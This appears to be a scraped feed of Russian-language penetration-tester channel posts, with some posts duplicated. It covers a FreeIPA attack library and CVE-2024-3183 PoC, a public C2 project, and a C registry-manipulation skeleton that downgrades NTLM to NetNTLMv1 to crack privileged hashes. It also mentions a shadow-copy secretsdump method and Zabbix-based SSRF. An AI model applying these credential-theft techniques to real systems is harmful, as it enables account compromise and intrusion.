Всем привет, в связи с тем что последнее время приходится часто пентестить FreeIPA мы начали разрабатывать либу по типу impacket заточенную под особенности ипы. Пока начали реализовывать kerberos и написали пок для CVE-2024-3183. Если у кого-то будет желание как-то помочь в разработке - welcome.

https://github.com/c2micro/ipapocket

GitHub

GitHub - c2micro/ipapocket: Python library for interacting with FreeIPA network protocols

Python library for interacting with FreeIPA network protocols - c2micro/ipapocket

Всем привет) давно хотел начать вести в паблике какой-нибудь проект, и вот решил ~~сейчас модно~~ писать публичный С2. Идей много, что из этого получится, пока не знаю... может так ничего и не выйдет, а вдруг будет (надеюсь) как с Empire - его кто-то начнет дописывать.

Так как софт будет публичный, а я не особо программист, то буду рад помощи не только в рефакторинге кодовой базы, написании модулей, расширений, но и к идеям для улучшений. Например, дизайн, алгоритмы, поиск багов, да и просто указать на востребованность какого-то функционала.

Теперь обращаюсь к тем, кто хочет поучаствовать, а также кому просто интересно следить за проектом. Вот канал и группа(по ссылке)... Спама на канале будет много: размышления, опросы и т.п.

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin.…

GitHub

GitHub - Gl3bGl4z/All_NTLM_leak

Contribute to Gl3bGl4z/All\_NTLM\_leak development by creating an account on GitHub.

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.

```
#include
#include
#include
#include
#include // для функции sleep

void GetRegKey(const char path, const char key, DWORD* oldValue) {
HKEY hKey;
DWORD value;
DWORD valueSize = sizeof(DWORD);

}

void SetRegKey(const char path, const char key, DWORD newValue) {
HKEY hKey;

}

void ExtendedNTLMDowngrade(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
GetRegKey("SYSTEM\CurrentControlSet\Control\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\CurrentControlSet\Control\Lsa", "LMCompatibilityLevel", 2);

}

void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
SetRegKey("SYSTEM\CurrentControlSet\Control\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}

int main() {
DWORD oldValue_LMCompatibilityLevel = 0;
DWORD oldValue_NtlmMinClientSec = 0;
DWORD oldValue_RestrictSendingNTLMTraffic = 0;

}
```

Компилируем так

x86\_64\-w64\-mingw32\-gcc \-o ntlm.exe ntlm.c

В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.

Давно хотел написать, но чет забывал. Уважаемые вендоры поибэ моей прекрасной Родины, я не раз отдавал вам rce в ваших инфраструктурах, данные клиентов, бывало даже дампы доменов. Время идёт, опыт показывает, что мало что меняется. Займитесь уже наконец-то…

Давно хотел написать, но чет забывал.
Уважаемые вендоры поибэ моей прекрасной Родины, я не раз отдавал вам rce в ваших инфраструктурах, данные клиентов, бывало даже дампы доменов. Время идёт, опыт показывает, что мало что меняется. Займитесь уже наконец-то внутренней безопасностью, у вас есть крутые кадры, только почему-то пентест вы своими силами своей же инфраструктуры не можете сделать. Весь рынок вы учите как строить иб, но у себя вы его так же почему то построить не можете. И т.д.

У меня в подписчиках точно есть те кому нужен обновляемый список public vpn exit nodes в soc, забирайте.

https://github.com/fortra/impacket/pull/1719
дамп sam/system/security через shadowcopy

GitHub

[SECRETSDUMP] New Dump Method - Shadow Snapshot Method via WMI by PeterGabaldon · Pull Request #1719 · fortra/impacket

[UPDATE] Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...

это не база, это базище?

Дополнение к предыдущему посту, zabbix agent умеет в ключ web.page.get, что собственно может быть использовано как ssrf и обход каких либо ограничений. И в принципе zabbix многое умеет делать с вебом, включая javascript